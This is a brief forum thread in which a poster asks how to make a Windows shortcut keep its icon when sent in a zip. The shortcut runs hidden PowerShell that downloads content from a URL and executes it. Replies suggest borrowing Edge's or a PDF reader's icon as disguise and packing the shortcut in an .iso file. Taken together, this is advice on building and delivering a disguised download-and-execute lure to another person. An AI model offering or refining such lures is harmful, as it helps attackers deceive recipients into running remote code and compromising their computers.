.lnk file icon missing

How to fix the icon missing issue when you are using .lnk files from a remote host ??

im using this parameter as the link

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -noP -sta -w 1 Invoke-WebRequest 'INSERT URL here' -UseBasicParsing | Select-Object -Expand Content | powershell


and starting in the

C:\Windows\SysWOW64\WindowsPowerShell\v1.0

but when zipping the .lnk to send to someone here the result
with no icon and asking if i want to save it

I need it to just to be able to open from zip file

This is problem not fix

its sorted i needed to link the icon to %ProgramFiles(x86)%\Microsoft\Edge\Application\msedge.exe
and when extracted its fine
the icon shows

Запуск из архива невозможен. Иконки работают по готовым путям, возможно, на твоей второй машине нет этого софта для чтения PDF(?).. Попробуй выбрать что-то из дефолтного

Put your .LNK inside an .iso file this will solve the problem with the icon
